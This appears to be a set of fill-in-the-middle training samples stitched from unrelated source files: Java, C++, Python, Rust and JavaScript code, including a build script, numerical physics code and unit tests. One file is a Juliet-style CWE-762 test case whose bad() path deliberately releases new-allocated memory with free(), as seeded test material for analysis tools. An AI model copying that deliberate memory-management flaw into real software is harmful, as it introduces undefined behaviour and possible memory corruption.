<|file_name|>FloatArray64.java<|end_file_name|><|fim▁begin|><|fim▁hole|>package bigarrays; /** * @author [email protected] * * Class for representing a float static array requiring address space larger than 32 bits. */ public class FloatArray64 { private static final int CHUNK_SIZE = 1024*1024*512; private long size; private float[][] data; public FloatArray64(long size) { this.size = size; if(size == 0) data = null; else { int chunks = (int)(size/CHUNK_SIZE); int remainder = (int)(size - ((long)chunks)*CHUNK_SIZE); data = new float[chunks+(remainder==0?0:1)][]; for(int idx=chunks; --idx>=0; ) data[idx] = new float[(int)CHUNK_SIZE]; if(remainder != 0) data[chunks] = new float[remainder]; } } public static int chunkSize() { return CHUNK_SIZE; } public float[] toArray() { if(this.data.length == 1) return this.data[0]; return null; } public float get(long index) { if(index < 0 || index >= size) throw new IndexOutOfBoundsException("Error attempting to access data element "+index+". Array is "+size+" elements long."); int chunk = (int)(index / CHUNK_SIZE); int offset = (int)(index - (((long)chunk) * CHUNK_SIZE)); return data[chunk][offset]; } public float[] getByChunk(int chunk) { if(chunk >= data.length) throw new IndexOutOfBoundsException("Error attempting to access chunk "+chunk+". Array is "+size+" elements long [" + data.length + " chunks]"); return data[chunk]; } public void set(long index, float b) { if(index<0 || index>=size) throw new IndexOutOfBoundsException("Error attempting to access data element "+index+". Array is "+size+" elements long."); int chunk = (int)(index/CHUNK_SIZE); int offset = (int)(index - (((long)chunk)*CHUNK_SIZE)); data[chunk][offset] = b; } public void set(int chunk, float[] b) { if(chunk >= data.length) throw new IndexOutOfBoundsException("Error attempting to access chunk "+chunk+". Array is "+size+" elements long [" + data.length + " chunks]"); data[chunk] = b; } public long size() { return this.size; } public IntArray64 toIntArray() { IntArray64 array = new IntArray64(this.size); for(long i = 0; i < size; i++) array.set(i, (int)this.get(i)); return array; } }<|fim▁end|>
<|file_name|>CWE762_Mismatched_Memory_Management_Routines__new_free_int64_t_21.cpp<|end_file_name|><|fim▁begin|>/* TEMPLATE GENERATED TESTCASE FILE Filename: CWE762_Mismatched_Memory_Management_Routines__new_free_int64_t_21.cpp Label Definition File: CWE762_Mismatched_Memory_Management_Routines__new_free.label.xml Template File: sources-sinks-21.tmpl.cpp */ /* * @description * CWE: 762 Mismatched Memory Management Routines * BadSource: Allocate data using new * GoodSource: Allocate data using malloc() * Sinks: * GoodSink: Deallocate data using delete * BadSink : Deallocate data using free() * Flow Variant: 21 Control flow: Flow controlled by value of a static global variable. All functions contained in one file. * * */ #include "std_testcase.h" namespace CWE762_Mismatched_Memory_Management_Routines__new_free_int64_t_21 { #ifndef OMITBAD /* The static variable below is used to drive control flow in the sink function */ static int badStatic = 0; static void badSink(int64_t * data) { if(badStatic) { /* POTENTIAL FLAW: Deallocate memory using free() - the source memory allocation function may * require a call to delete to deallocate the memory */ free(data); } } void bad() { int64_t * data; /* Initialize data*/ data = NULL; /* POTENTIAL FLAW: Allocate memory with a function that requires delete to free the memory */ data = new int64_t; badStatic = 1; /* true */ badSink(data); } #endif /* OMITBAD */ #ifndef OMITGOOD /* The static variables below are used to drive control flow in the sink functions. */ static int goodB2G1Static = 0; static int goodB2G2Static = 0; static int goodG2bStatic = 0; /* goodB2G1() - use badsource and goodsink by setting the static variable to false instead of true */ static void goodB2G1Sink(int64_t * data) { if(goodB2G1Static) { /* INCIDENTAL: CWE 561 Dead Code, the code below will never run */ printLine("Benign, fixed string"); } else { /* FIX: Deallocate the memory using delete */ delete data; } } static void goodB2G1() { int64_t * data; /* Initialize data*/ data = NULL; /* POTENTIAL FLAW: Allocate memory with a function that requires delete to free the memory */ data = new int64_t; goodB2G1Static = 0; /* false */ goodB2G1Sink(data); } /* goodB2G2() - use badsource and goodsink by reversing the blocks in the if in the sink function */ static void goodB2G2Sink(int64_t * data) { if(goodB2G2Static) { /* FIX: Deallocate the memory using delete */ delete data; } } static void goodB2G2() { int64_t * data; /* Initialize data*/ data = NULL; /* POTENTIAL FLAW: Allocate memory with a function that requires delete to free the memory */ data = new int64_t; goodB2G2Static = 1; /* true */ goodB2G2Sink(data); } /* goodG2B() - use goodsource and badsink */ static void goodG2BSink(int64_t * data) { if(goodG2bStatic) { /* POTENTIAL FLAW: Deallocate memory using free() - the source memory allocation function may * require a call to delete to deallocate the memory */ free(data); } } static void goodG2B() { int64_t * data; /* Initialize data*/ data = NULL; /* FIX: Allocate memory from the heap using malloc() */ data = (int64_t *)malloc(100*sizeof(int64_t)); goodG2bStatic = 1; /* true */ goodG2BSink(data); } void good() { goodB2G1(); goodB2G2(); goodG2B(); } #endif /* OMITGOOD */ } /* close namespace */ /* Below is the main(). It is only used when building this testcase on its own for testing or for building a binary to use in testing binary analysis tools. It is not used when compiling all the testcases as one application, which is how source code analysis tools are tested. */ #ifdef INCLUDEMAIN using namespace CWE762_Mismatched_Memory_Management_Routines__new_free_int64_t_21; /* so that we can use good and bad easily */ int main(int argc, char * argv[]) { /* seed randomness */ srand( (unsigned)time(NULL) ); #ifndef OMITGOOD <|fim▁hole|>#endif /* OMITGOOD */ #ifndef OMITBAD printLine("Calling bad()..."); bad(); printLine("Finished bad()"); #endif /* OMITBAD */ return 0; } #endif<|fim▁end|>
printLine("Calling good()..."); good(); printLine("Finished good()");
<|file_name|>deploy.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python3 import sys, os, shutil from os import path from urllib.request import pathname2url import subprocess from subprocess import call import sys import re import zipfile import config os.chdir(config.root_dir) SUPPORTED_OPERATING_SYSTEMS = ('windows_x64', 'linux_x64', 'mac')#, 'linux-arm32', 'linux-arm64') def make_dir(dir_path): """ make_dir(dir_path) creates a directory if it does not already exist, including parent directories. dir_path - directory to create """ if not path.exists(dir_path): os.makedirs(dir_path) def make_parent_dir(file_path): """ make_parent_dir(file_path) Creates the parent directory for the specified filepath if it does not already exist. file_path - path to some file """ parent_dir = path.dirname(file_path) if parent_dir == '': # means parent is working directory<|fim▁hole|> os.makedirs(parent_dir) def _del(filepath): """ Deletes a file or recursively deletes a directory. Use with caution. """ if(path.isdir(filepath)): for f in os.listdir(filepath): _del(path.join(filepath,f)) os.rmdir(filepath) elif(path.exists(filepath)): os.remove(filepath) def del_file(filepath): """ del_file(filepath): Deletes a file or recursively deletes a directory. Use with caution. filepath - path to file or directory to delete """ if(path.isdir(filepath)): for f in os.listdir(filepath): _del(path.join(filepath,f)) os.rmdir(filepath) elif(path.exists(filepath)): os.remove(filepath) def del_contents(dirpath): """ del_contents(dirpath) Recursively deletes the contents of a directory, but not the directory itself dirpath - path to directory to clean-out """ if(path.isdir(dirpath)): for f in os.listdir(dirpath): del_file(path.join(dirpath,f)) def list_files(dirpath): """ list_filetree(dirpath) Returns a list of all files inside a directory (recursive scan) dirpath - filepath of directory to scan """ if(type(dirpath) == str): dir_list = [dirpath] else: dir_list = dirpath file_list = [] for _dir_ in dir_list: for base, directories, files in os.walk(_dir_): for f in files: file_list.append(path.join(base,f)) return file_list def safe_quote_string(text): """ safe_quote_string(text) returns the text in quotes, with escapes for any quotes in the text itself text - input text to quote returns: text in quotes with escapes """ if os.sep != '\\': text2 = text.replace('\\', '\\\\') text3 = text2.replace('"', '\\"') else: text3 = text.replace('\\', '/') # windows does not allow " in file names anyway return '"'+text3+'"' def copy_tree(file_list, src_root, dest_root): """ copy_tree(file_list, src_root, dest_root) Copies all files to directory dest_root (creating it if necessary), preserving the folder structure relative to src_root """ for f in file_list: rel_path = path.relpath(f, src_root) dst_path = path.join(dest_root, rel_path) make_parent_dir(dst_path) shutil.copy(f, dst_path) def zip_dir(dir_path, zip_path): print('\nzipping %s to %s\n' % (dir_path, zip_path)) with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zipf: # zipf is zipfile handle for root, dirs, files in os.walk(dir_path): for file in files: fname = path.basename(dir_path) src_file = path.join(root, file) dst_file = path.join(fname, path.relpath(src_file, dir_path) ) zipf.write(src_file, arcname=dst_file) # done # make dirs make_dir(config.local_cache_dir) make_dir(config.compile_dir) make_dir(config.jar_dir) make_dir(config.deploy_dir) make_dir(config.deploy_image_dir) make_dir(config.run_dir) make_dir(config.src_dir) make_dir(config.resource_dir) # clean del_contents(config.run_dir) del_contents(config.jar_dir) del_contents(config.compile_dir) del_contents(config.deploy_image_dir) del_contents(config.deploy_dir) # compile (with jmods) for release_OS in SUPPORTED_OPERATING_SYSTEMS: print('\n',release_OS,'\n') module_src_path = path.join(config.src_dir, config.module_name) if(release_OS == 'windows_x64'): #java_home = 'D:\\CCHall\\Documents\\Programming\\OpenJDK_Distros\\windows-x64\\jdk-13.0.1' jmod_dirs = [path.join('jmods','windows')] #[path.join(java_home,'jmods')] + config.jmod_dirs_windows_x64 elif(release_OS == 'linux_x64'): #java_home = 'D:\\CCHall\\Documents\\Programming\\OpenJDK_Distros\\linux-x64\\jdk-13.0.1' jmod_dirs = [path.join('jmods','linux')] #[path.join(java_home,'jmods')] + config.jmod_dirs_linux_x64 elif(release_OS == 'mac'): #java_home = 'D:\\CCHall\\Documents\\Programming\\OpenJDK_Distros\\osx-x64\\jdk-13.0.1' jmod_dirs = [path.join('jmods','mac')] #[path.join(java_home,'jmods')] + config.jmod_dirs_mac else: print('UNSUPPORTED OS: %s' % release_OS) arg_file = path.join(config.local_cache_dir, 'javac-args.txt') command_list = [] command_list += ['-encoding', 'utf8'] command_list += ['-d', config.compile_dir] command_list += ['--module-source-path', config.src_dir] command_list += ['--module', config.module_name] module_paths = jmod_dirs + [f for f in list_files(config.dependency_dirs) if str(f).endswith('.jar')] # a .jmod file is auto-discoverable by --module-path command_list += ['--module-path', os.pathsep.join(module_paths)] with open(arg_file, 'w') as fout: file_content = ' '.join(map(safe_quote_string, command_list)) fout.write(file_content) print('@%s: %s' % (arg_file, file_content)) call([config.javac_exec, '@'+str(arg_file)], cwd=config.root_dir) print() # need to copy resources separately resource_files = list_files(config.resource_dir) resource_files += [f for f in list_files(config.src_dir) if str(f).endswith('.java') == False] copy_tree( list_files(config.resource_dir), config.src_dir, config.compile_dir ) copy_tree( [f for f in list_files(module_src_path) if str(f).endswith('.java') == False], config.src_dir, config.compile_dir ) # jlink arg_file = path.join(config.local_cache_dir, 'jlink-args.txt') command_list = [] command_list += ['--module-path', os.pathsep.join(module_paths + [config.compile_dir])] command_list += ['--add-modules', config.module_name] image_dir = path.join(config.deploy_image_dir, release_OS, config.module_name) command_list += ['--launcher', 'launch=%s/%s' % (config.module_name, config.main_class)] command_list += ['--output', image_dir] with open(arg_file, 'w') as fout: file_content = ' '.join(map(safe_quote_string, command_list)) fout.write(file_content) print('@%s: %s' % (arg_file, file_content)) call([config.jlink_exec, '@'+str(arg_file)], cwd=config.root_dir) # launcher if release_OS == 'windows_x64': with open(path.join(image_dir, 'launch_%s.bat' % config.module_title),'w') as fout: fout.write('"%~dp0\\bin\\launch.bat"\r\n') if release_OS == 'linux_x64': with open(path.join(image_dir, 'launch_%s.sh' % config.module_title),'w') as fout: fout.write('#!/bin/bash\ncd "`dirname "$0"`"\n./bin/launch\n') if release_OS == 'mac': with open(path.join(image_dir, 'launch_%s.sh' % config.module_title),'w') as fout: fout.write('#!/bin/sh\ncd "`dirname "$0"`"\n./bin/launch\n') # package images named_dir = path.join(config.deploy_image_dir, release_OS, config.module_title) zip_file = path.join(config.deploy_image_dir, '%s_%s.zip' % (config.module_title, release_OS)) shutil.move(image_dir, named_dir) zip_dir(dir_path=named_dir, zip_path=zip_file)<|fim▁end|>
return if not path.isdir(parent_dir):
<|file_name|>devices.rs<|end_file_name|><|fim▁begin|>use std::collections::HashSet; use std::collections::HashMap; use std::fmt; use winapi::shared::hidpi::{HIDP_BUTTON_CAPS, HIDP_CAPS, HIDP_VALUE_CAPS}; use winapi::um::winnt::HANDLE; use winapi::um::winuser::RID_DEVICE_INFO; #[derive(Clone)] pub struct MouseInfo { pub name: String, pub handle: HANDLE, pub serial: Option<String>, pub info: RID_DEVICE_INFO, } impl fmt::Debug for MouseInfo { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { f.debug_struct("Mouse Info") .field("name", &self.name) .field("handle", &self.handle) .field("serial", &self.serial) .finish() } } #[derive(Clone, Debug)] pub struct MouseDisplayInfo { pub name: String, pub serial: Option<String>, } impl From<MouseInfo> for MouseDisplayInfo { fn from(mouse: MouseInfo) -> Self { Self { name: mouse.name, serial: mouse.serial } } } #[derive(Clone)] pub struct KeyboardInfo { pub name: String, pub handle: HANDLE, pub serial: Option<String>, pub info: RID_DEVICE_INFO, } impl fmt::Debug for KeyboardInfo { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { f.debug_struct("Keyboard Info") .field("name", &self.name) .field("handle", &self.handle) .field("serial", &self.serial) .finish() } } #[derive(Clone, Debug)] pub struct KeyboardDisplayInfo { pub name: String, pub serial: Option<String>, } impl From<KeyboardInfo> for KeyboardDisplayInfo { fn from(keyboard: KeyboardInfo) -> Self { Self { name: keyboard.name, serial: keyboard.serial } } } #[derive(Clone)] pub struct JoystickInfo { pub name: String, pub handle: HANDLE, pub serial: Option<String>, pub info: RID_DEVICE_INFO, pub caps: HIDP_CAPS, pub button_caps: Vec<HIDP_BUTTON_CAPS>, pub value_caps: Vec<HIDP_VALUE_CAPS>, pub preparsed_data: Vec<u8>, pub state: JoystickState, pub is_360_controller: bool, } impl fmt::Debug for JoystickInfo { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { f.debug_struct("Joystick Info") .field("name", &self.name) .field("handle", &self.handle) .field("serial", &self.serial) .field("360 Controller?", &self.is_360_controller) .finish() } } #[derive(Clone, Debug)] pub struct JoystickDisplayInfo { pub name: String, pub serial: Option<String>, } impl From<JoystickInfo> for JoystickDisplayInfo { fn from(joystick: JoystickInfo) -> Self { Self { name: joystick.name, serial: joystick.serial } } } #[derive(Clone, Debug)] pub enum DeviceInfo { Mouse(MouseInfo), Keyboard(KeyboardInfo), Joystick(JoystickInfo), } /// Stores Names to All Raw Input Devices #[derive(Clone)] pub struct Devices { pub mice: Vec<MouseInfo>, pub keyboards: Vec<KeyboardInfo>, pub joysticks: Vec<JoystickInfo>, pub device_map: HashMap<HANDLE, usize>, pub original_device_map: HashMap<HANDLE, usize>, } <|fim▁hole|> mice: Vec::new(), keyboards: Vec::new(), joysticks: Vec::new(), device_map: HashMap::new(), original_device_map: HashMap::new(), } } } impl Devices { pub fn filter_device_map(&mut self, device_filter: HashSet<String>) { self.device_map = HashMap::new(); for (pos, mouse) in self.mice.iter().enumerate() { if device_filter.contains(&mouse.name) { self.device_map.insert(mouse.handle, pos); } } for (pos, keyboard) in self.keyboards.iter().enumerate() { if device_filter.contains(&keyboard.name) { self.device_map.insert(keyboard.handle, pos); } } for (pos, joystick) in self.joysticks.iter().enumerate() { if device_filter.contains(&joystick.name) { self.device_map.insert(joystick.handle, pos); } } } pub fn reset_device_map(&mut self) { self.device_map = self.original_device_map.clone(); } } /// Striped down version of devices fit for sharing across threads #[derive(Clone, Debug)] pub struct DevicesDisplayInfo { pub mice: Vec<MouseDisplayInfo>, pub keyboards: Vec<KeyboardDisplayInfo>, pub joysticks: Vec<JoystickDisplayInfo>, } impl From<Devices> for DevicesDisplayInfo { fn from(devices: Devices) -> Self { Self { mice: devices.mice.iter().cloned().map(|m| m.into()).collect(), keyboards: devices.keyboards.iter().cloned().map(|m| m.into()).collect(), joysticks: devices.joysticks.iter().cloned().map(|m| m.into()).collect() } } } #[derive(Clone, Debug)] pub struct JoystickState { pub button_states: Vec<bool>, pub axis_states: Axes, pub hatswitch: Option<HatSwitch>, pub raw_axis_states: RawAxes, } impl JoystickState { pub fn new( p_button_caps: Vec<HIDP_BUTTON_CAPS>, p_value_caps: Vec<HIDP_VALUE_CAPS>, ) -> JoystickState { unsafe { let mut button_states: Vec<bool> = Vec::new(); if p_button_caps.len() > 0 { let ref button_caps = p_button_caps[0]; let number_of_buttons = button_caps.u.Range().UsageMax - button_caps.u.Range().UsageMin + 1; for _ in 0..number_of_buttons { button_states.push(false); } } let mut axis_states = Axes::new(); let mut hatswitch: Option<HatSwitch> = None; for value_caps in p_value_caps { if value_caps.u.Range().UsageMin == 0x30 { axis_states.x = Some(0f64); } if value_caps.u.Range().UsageMin == 0x31 { axis_states.y = Some(0f64); } if value_caps.u.Range().UsageMin == 0x32 { axis_states.z = Some(0f64); } if value_caps.u.Range().UsageMin == 0x33 { axis_states.rx = Some(0f64); } if value_caps.u.Range().UsageMin == 0x34 { axis_states.ry = Some(0f64); } if value_caps.u.Range().UsageMin == 0x35 { axis_states.rz = Some(0f64); } if value_caps.u.Range().UsageMin == 0x36 { axis_states.slider = Some(0f64); } if value_caps.u.Range().UsageMin == 0x39 { hatswitch = Some(HatSwitch::Center); } } JoystickState { button_states: button_states, axis_states: axis_states, hatswitch: hatswitch, raw_axis_states: RawAxes::new(), } } } } #[derive(Clone, Debug)] pub struct Axes { pub x: Option<f64>, pub y: Option<f64>, pub z: Option<f64>, pub rx: Option<f64>, pub ry: Option<f64>, pub rz: Option<f64>, pub slider: Option<f64>, } impl Axes { pub fn new() -> Axes { Axes { x: None, y: None, z: None, rx: None, ry: None, rz: None, slider: None, } } } #[derive(Clone, Debug)] pub struct RawAxes { pub x: u32, pub y: u32, pub z: u32, pub rx: u32, pub ry: u32, pub rz: u32, pub slider: u32, } impl RawAxes { pub fn new() -> RawAxes { RawAxes { x: 0u32, y: 0u32, z: 0u32, rx: 0u32, ry: 0u32, rz: 0u32, slider: 0u32, } } } #[derive(Clone, Debug, PartialEq, Eq, Hash)] pub enum HatSwitch { Center, Up, UpRight, Right, DownRight, Down, DownLeft, Left, UpLeft, }<|fim▁end|>
impl Devices { pub fn new() -> Devices { Devices {
<|file_name|>HyperElasticPhaseFieldIsoDamage.C<|end_file_name|><|fim▁begin|>/****************************************************************/ /* MOOSE - Multiphysics Object Oriented Simulation Environment */ /* */ /* All contents are licensed under LGPL V2.1 */ /* See LICENSE for full restrictions */ /****************************************************************/ #include "HyperElasticPhaseFieldIsoDamage.h" template<> InputParameters validParams<HyperElasticPhaseFieldIsoDamage>() { InputParameters params = validParams<FiniteStrainHyperElasticViscoPlastic>(); params.addParam<bool>("numerical_stiffness", false, "Flag for numerical stiffness"); params.addParam<Real>("damage_stiffness", 1e-8, "Avoid zero after complete damage"); params.addParam<Real>("zero_tol", 1e-12, "Tolerance for numerical zero"); params.addParam<Real>("zero_perturb", 1e-8, "Perturbation value when strain value less than numerical zero"); params.addParam<Real>("perturbation_scale_factor", 1e-5, "Perturbation scale factor"); params.addRequiredCoupledVar("c", "Damage variable"); params.addClassDescription("Computes damaged stress and energy in the intermediate configuration assuming isotropy"); return params; } HyperElasticPhaseFieldIsoDamage::HyperElasticPhaseFieldIsoDamage(const InputParameters & parameters) : FiniteStrainHyperElasticViscoPlastic(parameters), _num_stiffness(getParam<bool>("numerical_stiffness")), _kdamage(getParam<Real>("damage_stiffness")), _zero_tol(getParam<Real>("zero_tol")), _zero_pert(getParam<Real>("zero_perturb")), _pert_val(getParam<Real>("perturbation_scale_factor")), _c(coupledValue("c")), _save_state(false), _G0(declareProperty<Real>(_base_name + "G0")), _dG0_dstrain(declareProperty<RankTwoTensor>(_base_name + "dG0_dstrain")), _dstress_dc(declarePropertyDerivative<RankTwoTensor>(_base_name + "stress", getVar("c", 0)->name())), _etens(LIBMESH_DIM) { } void HyperElasticPhaseFieldIsoDamage::computePK2StressAndDerivative() { computeElasticStrain(); _save_state = true; computeDamageStress(); _pk2[_qp] = _pk2_tmp; _save_state = false; if (_num_stiffness) computeNumStiffness();<|fim▁hole|> _dce_dfe.zero(); for (unsigned int i = 0; i < LIBMESH_DIM; ++i) for (unsigned int j = 0; j < LIBMESH_DIM; ++j) for (unsigned int k = 0; k < LIBMESH_DIM; ++k) { _dce_dfe(i, j, k, i) = _dce_dfe(i, j, k, i) + _fe(k, j); _dce_dfe(i, j, k, j) = _dce_dfe(i, j, k, j) + _fe(k, i); } _dpk2_dfe = _dpk2_dce * _dce_dfe; } void HyperElasticPhaseFieldIsoDamage::computeDamageStress() { Real lambda = _elasticity_tensor[_qp](0, 0, 1, 1); Real mu = _elasticity_tensor[_qp](0, 1, 0, 1); Real c = _c[_qp]; Real xfac = std::pow(1.0-c, 2.0) + _kdamage; std::vector<Real> w; RankTwoTensor evec; _ee.symmetricEigenvaluesEigenvectors(w, evec); for (unsigned int i = 0; i < LIBMESH_DIM; ++i) _etens[i].vectorOuterProduct(evec.column(i), evec.column(i)); Real etr = 0.0; for (unsigned int i = 0; i < LIBMESH_DIM; ++i) etr += w[i]; Real etrpos=(std::abs(etr)+etr)/2.0; Real etrneg=(std::abs(etr)-etr)/2.0; RankTwoTensor pk2pos, pk2neg; for (unsigned int i = 0; i < LIBMESH_DIM; ++i) { pk2pos += _etens[i] * (lambda * etrpos + 2.0 * mu * (std::abs(w[i]) + w[i])/2.0); pk2neg += _etens[i] * (lambda * etrneg + 2.0 * mu * (std::abs(w[i]) - w[i])/2.0); } _pk2_tmp = pk2pos * xfac - pk2neg; if (_save_state) { std::vector<Real> epos(LIBMESH_DIM); for (unsigned int i = 0; i < LIBMESH_DIM; ++i) epos[i] = (std::abs(w[i]) + w[i])/2.0; _G0[_qp] = 0.0; for (unsigned int i = 0; i < LIBMESH_DIM; ++i) _G0[_qp] += std::pow(epos[i], 2.0); _G0[_qp] *= mu; _G0[_qp] += lambda * std::pow(etrpos, 2.0)/2.0; _dG0_dee = pk2pos; _dpk2_dc = -pk2pos * (2.0 * (1.0-c)); } } void HyperElasticPhaseFieldIsoDamage::computeNumStiffness() { RankTwoTensor ee_tmp; for (unsigned int i = 0; i < LIBMESH_DIM; ++i) for (unsigned int j = i; j < LIBMESH_DIM; ++j) { Real ee_pert = _zero_pert; if (std::abs(_ee(i, j)) > _zero_tol) ee_pert = _pert_val * std::abs(_ee(i, j)); ee_tmp = _ee; _ee(i, j) += ee_pert; computeDamageStress(); for (unsigned int k = 0; k < LIBMESH_DIM; ++k) for (unsigned int l = 0; l < LIBMESH_DIM; ++l) { _dpk2_dee(k, l, i, j) = (_pk2_tmp(k, l) - _pk2[_qp](k, l))/ee_pert; _dpk2_dee(k, l, j, i) = (_pk2_tmp(k, l) - _pk2[_qp](k, l))/ee_pert; } _ee = ee_tmp; } } void HyperElasticPhaseFieldIsoDamage::computeQpJacobian() { FiniteStrainHyperElasticViscoPlastic::computeQpJacobian(); RankTwoTensor dG0_dce = _dee_dce.innerProductTranspose(_dG0_dee); RankTwoTensor dG0_dfe = _dce_dfe.innerProductTranspose(dG0_dce); RankTwoTensor dG0_df = _dfe_df.innerProductTranspose(dG0_dfe); _dG0_dstrain[_qp] = _df_dstretch_inc.innerProductTranspose(dG0_df); _dstress_dc[_qp] = _fe.mixedProductIkJl(_fe) * _dpk2_dc; }<|fim▁end|>
if (_num_stiffness) _dpk2_dce = _dpk2_dee * _dee_dce;
<|file_name|>typedarray-prototype.js<|end_file_name|><|fim▁begin|>// Any copyright is dedicated to the Public Domain. // http://creativecommons.org/licenses/publicdomain/ //----------------------------------------------------------------------------- var BUGNUMBER = 565604; var summary = "Typed-array properties don't work when accessed from an object whose " + "prototype (or further-descended prototype) is a typed array"; print(BUGNUMBER + ": " + summary); /************** * BEGIN TEST * **************/ var o = Object.create(new Uint8Array(1)); assertEq(o.length, 1); var o2 = Object.create(o); assertEq(o2.length, 1); var VARIABLE_OBJECT = {}; var props = [ { property: "length", value: 1 }, { property: "byteLength", value: 1 }, { property: "byteOffset", value: 0 }, { property: "buffer", value: VARIABLE_OBJECT }, ]; for (var i = 0, sz = props.length; i < sz; i++) {<|fim▁hole|> var o = Object.create(new Uint8Array(1)); var v = o[p.property]; if (p.value !== VARIABLE_OBJECT) assertEq(o[p.property], p.value, "bad " + p.property + " (proto)"); var o2 = Object.create(o); if (p.value !== VARIABLE_OBJECT) assertEq(o2[p.property], p.value, "bad " + p.property + " (grand-proto)"); assertEq(o2[p.property], v, p.property + " mismatch"); } reportCompare(true, true);<|fim▁end|>
var p = props[i];
<|file_name|>list_filtering.js<|end_file_name|><|fim▁begin|>function changeQueryStr(name, value) { var query = window.location.search.substring(1), newQuery = '?', notFound = true, vars = query.split('&'); for (var i = 0; i < vars.length; i++) { var pair = vars[i].split('='); if (pair == '' || pair[0] == 'page') continue;<|fim▁hole|> if (pair[0] == name) { notFound = false; pair[1] = value; } if (pair[1].length > 0) { newQuery += pair[0] + '=' + pair[1] + '&'; } } if (notFound && value.length > 0) { newQuery += name + '=' + value; } else if (newQuery.length == 1) { newQuery = ''; } else { newQuery = newQuery.slice(0,-1); } var loc = window.location, ajaxurl = '/ajax' + loc.pathname + newQuery, newurl = loc.protocol + "//" + loc.host + loc.pathname + newQuery; $.get(ajaxurl).done(function(data){ $('#ajax-content').html(data); init_pagination(); }); window.history.pushState({path:newurl},'',newurl); } function init_filtering_stories(jQuery) { $('#filtering input').change(function(){ var input = $(this), name = input[0].name, value=input.val(); changeQueryStr(name, value); }); } function init_pagination(jQuery) { $('.pager a').on('click', function(e){ e.preventDefault(); var value = $(this).closest('li').data('pageNum'); if (value) changeQueryStr('page', String(value)); }); } $(document).ready(init_filtering_stories); $(document).ready(init_pagination);<|fim▁end|>
<|file_name|>test_python_2d_ns.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python # -*- coding: utf-8 -*- """ test_python_2d_ns ---------------------------------- Tests for `python_2d_ns` module. """ import sys import unittest from python_2d_ns.python_2d_ns import * class TestPython_2d_ns(unittest.TestCase): #test x, y coordinates generated by function IC_coor #assume use 2 threads and rank==1 #y coordinate should be the same as serial code def test_IC_coor_y_coor(self): x, y, kx, ky, k2, k2_exp=IC_coor(64, 64, 32, 1, 1, 1, 2) self.assertTrue(y[3,0]==-32) self.assertTrue(y[3,5]==-27) #x coordinate for rank 2 should start from 0 def test_IC_coor_x_coor(self): x, y, kx, ky, k2, k2_exp=IC_coor(64, 64, 32, 1, 1, 1, 2)<|fim▁hole|> #generate kx, ky, assume 2 threads, rank==0 x, y, kx, ky, k2, k2_exp=IC_coor(32, 32, 16, 1, 1, 0, 2) Vxhat, Vyhat=IC_condition(1, 2, kx, ky, 32, 16) #this wavenumber should be zero self.assertTrue(Vyhat[2,5]==0) #this wavenumber should be non-zero self.assertTrue(Vxhat[14,14]==0.5j) #test dealiasing function, which will remove values in wavenumber >= Nx/3 def test_delias(self): #generate kx, ky, assume 2 threads, rank==1 Vxhat=zeros((Nx, Np), dtype=complex); Vyhat=zeros((Nx, Np), dtype=complex); Vxhat[:]=1 Vxhat, Vyhat=delias(Vxhat, Vyhat, Nx, Np, k2) #this should be zero self.assertTrue(Vxhat[Nx-1,Np-1]==0) self.assertTrue(Vyhat[Nx-1,Np-1]==0) #test FFT and IFFT. Take FFT and IFFT on array, it will transform back (with some numerical errors) def test_FFT(self): testa=zeros((Np, Ny), dtype=float); testahat=empty(( N, Np) , dtype = complex ) if rank==0: testa[2,0]=1 testa=ifftn_mpi(fftn_mpi(testa, testahat), testa) #after FFT and IFFT, this value should be the same if rank==0: self.assertTrue(testa[2,0]-1<0.0001) if __name__ == '__main__': sys.exit(unittest.main())<|fim▁end|>
#this coordinate should be 0 self.assertTrue(x[0,2]==0) #test initial condition, Taylor green forcing, test whether the value is given on specific wavenumber def test_IC_con(self):
<|file_name|>borrowed-unique-basic.rs<|end_file_name|><|fim▁begin|>// Copyright 2013-2014 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. // min-lldb-version: 310 // Gdb doesn't know about UTF-32 character encoding and will print a rust char as only // its numerical value. // compile-flags:-g // === GDB TESTS =================================================================================== // gdb-command:run // gdb-command:print *bool_ref // gdb-check:$1 = true // gdb-command:print *int_ref // gdb-check:$2 = -1 // gdb-command:print *char_ref // gdb-check:$3 = 97 // gdb-command:print/d *i8_ref // gdb-check:$4 = 68 // gdb-command:print *i16_ref // gdb-check:$5 = -16 // gdb-command:print *i32_ref // gdb-check:$6 = -32 // gdb-command:print *i64_ref // gdb-check:$7 = -64 // gdb-command:print *uint_ref // gdb-check:$8 = 1 // gdb-command:print/d *u8_ref // gdb-check:$9 = 100 // gdb-command:print *u16_ref // gdb-check:$10 = 16 // gdb-command:print *u32_ref // gdb-check:$11 = 32 // gdb-command:print *u64_ref // gdb-check:$12 = 64 // gdb-command:print *f32_ref // gdb-check:$13 = 2.5 // gdb-command:print *f64_ref // gdb-check:$14 = 3.5 // === LLDB TESTS ================================================================================== // lldb-command:type format add -f decimal char // lldb-command:type format add -f decimal 'unsigned char' // lldb-command:run // lldb-command:print *bool_ref // lldb-check:[...]$0 = true // lldb-command:print *int_ref // lldb-check:[...]$1 = -1 // d ebugger:print *char_ref // c heck:[...]$3 = 97 // lldb-command:print *i8_ref // lldb-check:[...]$2 = 68 // lldb-command:print *i16_ref // lldb-check:[...]$3 = -16 // lldb-command:print *i32_ref // lldb-check:[...]$4 = -32 // lldb-command:print *i64_ref // lldb-check:[...]$5 = -64 // lldb-command:print *uint_ref // lldb-check:[...]$6 = 1 // lldb-command:print *u8_ref // lldb-check:[...]$7 = 100 // lldb-command:print *u16_ref // lldb-check:[...]$8 = 16 // lldb-command:print *u32_ref // lldb-check:[...]$9 = 32 // lldb-command:print *u64_ref // lldb-check:[...]$10 = 64 // lldb-command:print *f32_ref // lldb-check:[...]$11 = 2.5 // lldb-command:print *f64_ref // lldb-check:[...]$12 = 3.5 #![allow(unused_variables)]<|fim▁hole|> fn main() { let bool_box: Box<bool> = box true; let bool_ref: &bool = &*bool_box; let int_box: Box<int> = box 